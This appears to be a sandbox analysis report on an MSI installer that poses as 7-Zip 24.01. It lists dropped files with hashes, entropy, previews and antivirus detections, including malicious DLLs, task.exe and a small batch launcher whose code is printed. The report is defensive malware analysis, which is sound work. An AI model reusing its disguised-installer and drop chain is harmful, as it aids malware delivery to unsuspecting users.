                                                                                                                                                              MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                              SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                              SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                              SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):47
                                                                                                                                                              Entropy (8bit):4.493433469104717
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):35302
                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):86
                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                              MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                              SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                              SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                              SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien
                                                                                                                                                              Process:C:\Users\user\task.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):482524
                                                                                                                                                              Entropy (8bit):7.997356907892145
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:xVafxSS8uR/EN9QyGcEdjUi7hJqef1euJigVxNAjJ1mad:+pnoOKi7Hpf1Qwr41
                                                                                                                                                              MD5:1CB29EF9003E93F65B93CE8B8B7C24DD
                                                                                                                                                              SHA1:9BE4AA7AB2E4C71DC70D03AF435330C6BFB5C470
                                                                                                                                                              SHA-256:9BE5145BAEB34D733AF9A7FA55139A4917EF080D777AC8EC7F5E8B42620605E6
                                                                                                                                                              SHA-512:259EFB3FE2842908DCF4E4950DA40DBDC6803DDF0DD5BA6716486CB715F356068A94E066CEEFD4ED42D949787D6FC9190483C799ADD5D08620E16B4BC00BBA3C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40376
                                                                                                                                                              Entropy (8bit):5.902054884820747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: 7-Zip 24.01 (x64) 24.1.0.0, Subject: 7-Zip 24.01 (x64), Author: Igor Pavlov, Keywords: Installer, Template: x64;1033, Revision Number: {5131F5EE-04FE-4DDC-B86B-F721A2EEC0E9}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1753088
                                                                                                                                                              Entropy (8bit):7.884974179529995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:BpRhaYJ+2/8yJ5OA4COg9lyp31X01clj+u1GTsF:BpDJ+2pgA4+6p31is+u1G4
                                                                                                                                                              MD5:7C26877FCD894CC1355F2A31A551243C
                                                                                                                                                              SHA1:80104216DA4CD3449EABF0E0DE2BB3A5B2DE85CA
                                                                                                                                                              SHA-256:FF389718792F877FBDABE5CB02A1B3D5DE5BE988F9B5690250FFDF3409F04000
                                                                                                                                                              SHA-512:A57A961A3339B105F9D5653B69269ED7AAB952A4E16600426EDEE80D628A9AC62A13B5EA642FFD9765FDADA7B0DB5C5A85A21BC88C125BE122BF3C4E89D0CFB8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):212992
                                                                                                                                                              Entropy (8bit):6.513409725320959
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:xspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCL42loHUvU0yGxr5GqM2a8:jtOdiRQYpgjpjew5DHyGxcqo8
                                                                                                                                                              MD5:0C8921BBCC37C6EFD34FAF44CF3B0CB5
                                                                                                                                                              SHA1:DCFA71246157EDCD09EECAF9D4C5E360B24B3E49
                                                                                                                                                              SHA-256:FD622CF73EA951A6DE631063ABA856487D77745DD1500ADCA61902B8DDE56FE1
                                                                                                                                                              SHA-512:ED55443E20D40CCA90596F0A0542FA5AB83FE0270399ADFAAFD172987FB813DFD44EC0DA0A58C096AF3641003F830341FE259AD5BCE9823F238AE63B7E11E108
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.1640027875426617
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:JSbX72FjzvQAGiLIlHVRpZh/7777777777777777777777777vDHFeyv3it/l0i5:J5vQQI5t81iF
                                                                                                                                                              MD5:90C3BA3CF1C8E7FF1E56F68B3D22E302
                                                                                                                                                              SHA1:EBCFE0F0610FE736E79DF8144649E08774A69E29
                                                                                                                                                              SHA-256:D922C431BB3A8725626C54ACA6D03DACE34B0918064C419313C59360A7041E33
                                                                                                                                                              SHA-512:83A71EF1A8CB026813A118C6D06B1FECA11727BEAE4D878DBFD78D5B34D3FE728D4D042707EEB814257C1F5C3D1637EA635B0CD64533A25BD76C66C852942CB8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.499693131712612
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:j8PhquRc06WXJaFT5uVmdASPgsrlqdASBq4rl0kU:Khq1RFTwVxj4Fqq
                                                                                                                                                              MD5:9E576925D6875B83750F21DECF01F3A8
                                                                                                                                                              SHA1:5359EFB812F0F2F7948EEAC9E9AC5136C8D684A7
                                                                                                                                                              SHA-256:CB59EBAE8CB3F3B0E1F74751E9A29044725699390B62747A7F72BBB8782E9822
                                                                                                                                                              SHA-512:3A37CAAE6CB669607B85EFE5FC7E11FA8EBE51CD46339F777CA42209F4BE2C38B44382D7868E1D7F0028329AC92BD9BCB727281E131DEBAB7E6CF28EC54B3944
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:CSV text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):345054
                                                                                                                                                              Entropy (8bit):4.386425894902289
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:0K9KmK9KIK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7N:m
                                                                                                                                                              MD5:0F10BF248874EB7BA14069DF267ABE7B
                                                                                                                                                              SHA1:32AFF36EAEBF20CC60532B6FCB7B8B9F5BBD8A33
                                                                                                                                                              SHA-256:542ABD593DBCA2277D5197EC101C299F16EAF277A260073695CC0F17BDBD2CD7
                                                                                                                                                              SHA-512:75BBE373EDF8392151B45D6199A413F38E1F75FC08F1F61ED02BD0E37285ECA9E131FD4CE3BCAE961417441E998FD584F82711E7D68A81DEA03DA6AF917DE26E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.2023-10-03 11:48:47, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX CJob::Resume completed with status: 0x0..2023-10-03 11:48:47, Info DPX Ended DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):360001
                                                                                                                                                              Entropy (8bit):5.362965230318755
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauK:zTtbmkExhMJCIpE/
                                                                                                                                                              MD5:E6ABBA528AFEB13655C512A8A9218579
                                                                                                                                                              SHA1:A26121333027EAF6CEF995A4C4B9310D47B3C704
                                                                                                                                                              SHA-256:ED4FD82B627B18E0B3E2E35029CD276F9FD1AF67555DB1A17059067FD1604EC3
                                                                                                                                                              SHA-512:2AB1B0A2CCD27D557FD115707E0062E09F1CEF5C4311C7952BA0198087718157551643AF5210AE04829FF1B476DBFACB405872A1C09ADFEFA81E6BAB14EE29B8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):1.205240312217102
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:JhiuQPveFXJLT5MVmdASPgsrlqdASBq4rl0kU:DigzTKVxj4Fqq
                                                                                                                                                              MD5:4F1C3ADCCD9581C846CFC332386F6EA7
                                                                                                                                                              SHA1:9DBCAB705685910ED82C2F5898FC1D687DF7AA5B
                                                                                                                                                              SHA-256:D5F306E560E91FCE6D1671317D284984E7462972B68BE492AC6D3A413E426501
                                                                                                                                                              SHA-512:B5BFF7C1B58E9FE8A8292078623DCB49F0BD093807B71F5D5944E4761871E23C2891CCDC5DF1ABB57E453A86626655BE59B1F6C334462EC629C2D15FCB8AE776
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):0.07199368040356892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOE4JOv2NvVMlXgVky6lit/:2F0i8n0itFzDHFeyvSbit/
                                                                                                                                                              MD5:B9378D6330BEF697D3C7EB1EA04EC81F
                                                                                                                                                              SHA1:E7C4072B790FB6D9554ABCC857171C871F3302F7
                                                                                                                                                              SHA-256:876EDA1FD7020539489B6A11AB87114C6B8ED82069712227ED9D1FEA26A31639
                                                                                                                                                              SHA-512:87B1947EDE1B8E9BEBEE9D847F3FF1F11817AD90640291DDC9F7566B02B54CF54E6F28E250B373576D766D01D9DC2FC0CD3D913454598D7D6CBD5FA604BAD118
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.499693131712612
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:j8PhquRc06WXJaFT5uVmdASPgsrlqdASBq4rl0kU:Khq1RFTwVxj4Fqq
                                                                                                                                                              MD5:9E576925D6875B83750F21DECF01F3A8
                                                                                                                                                              SHA1:5359EFB812F0F2F7948EEAC9E9AC5136C8D684A7
                                                                                                                                                              SHA-256:CB59EBAE8CB3F3B0E1F74751E9A29044725699390B62747A7F72BBB8782E9822
                                                                                                                                                              SHA-512:3A37CAAE6CB669607B85EFE5FC7E11FA8EBE51CD46339F777CA42209F4BE2C38B44382D7868E1D7F0028329AC92BD9BCB727281E131DEBAB7E6CF28EC54B3944
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):512
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3::
                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):69632
                                                                                                                                                              Entropy (8bit):0.11761570969549515
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:cUt91JfAebfdAipV7qqdAipVdVqKwGvlrkg9SUC+MNIR:cUt91rfdASBqqdASPgsrlCT
                                                                                                                                                              MD5:5BE7C70C07FABD0EF5855D8097912C68
                                                                                                                                                              SHA1:22577DEB128FE6073AC6524D6E41BE3823193547
                                                                                                                                                              SHA-256:248D6057D06B0F1B59B15F6F5AC6A0FB32740180E8F94A601696FF448AE0F5AC
                                                                                                                                                              SHA-512:495C5268B2C84ED85B8A90A78407156085D7A78E606AC6B8267CCA7EAFE0D946FEF9621658A37B7C2F015A0C5600776BBD341E8FED0024815555BC17A6E273C0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):512
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3::
                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                              Entropy (8bit):4.394436758265534
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:ml4fiJoH0ncNXiUjt10qMG/gaocYGBoaUMMhA2NX4WABlBuNA4OBSqa:m4vFMMYQUMM6VFYS4U
                                                                                                                                                              MD5:976DF6563AD166C8B8F23F3CF2733190
                                                                                                                                                              SHA1:16DC397221BFF8E766F62180AD93AE940561ECA7
                                                                                                                                                              SHA-256:3F4C555F7542CE8525342BBA5477907A62213FFC3CDEBB7612BD13B235B81B2A
                                                                                                                                                              SHA-512:F71A3EF4455FF5946458326A1029A414437F1372C4CC70AB7112F8E56B5C170F9667336294197FD9CBCE18CACB95C20985AB964E77DDF8E036D9FC003CC8E56B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz7...;..............................................................................................................................................................................................................................................................................................................................................#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:ASCII text, with CRLF, CR, LF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):442
                                                                                                                                                              Entropy (8bit):4.740731882997071
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:zx3MmSLQHtBXVNsRpXqykHIqXQHX4qpIsHwD0DIZJQN80n:zK/0HtBFNEpxLTIc8D0DYJQl
                                                                                                                                                              MD5:09AF173D6C2E576A83171FDACCDA4ECA
                                                                                                                                                              SHA1:5EAF0E13191C130A35C1C79313434E9E47002B36
                                                                                                                                                              SHA-256:EAA790702D8C7687456CCF4561950A1A3FDA0987C33CF2DFE07995E9144B91E3
                                                                                                                                                              SHA-512:A7E39E6850B586203EFFB8BC89A53E259A38A9263C574EEA62F6C633DDEFEEA1D03B794040C56DBD2027436E455F1D48D857273EDAB6B71938EFE53823B2F2A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding files\data.bin to Extraction Queue..Adding files\g2m.dll to Extraction Queue..Adding files\run.bat to Extraction Queue..Adding files\task.exe to Extraction Queue..Adding files\task22.msi to Extraction Queue..Adding files\your_package_name.dll to Extraction Queue....Expanding Files ........Expanding Files Complete .....6 files total...
                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: 7-Zip 24.01 (x64) 24.1.0.0, Subject: 7-Zip 24.01 (x64), Author: Igor Pavlov, Keywords: Installer, Template: x64;1033, Revision Number: {5131F5EE-04FE-4DDC-B86B-F721A2EEC0E9}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Entropy (8bit):7.884974179529995
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:wE1inOhJA5.msi
                                                                                                                                                              File size:1'753'088 bytes
                                                                                                                                                              MD5:7c26877fcd894cc1355f2a31a551243c
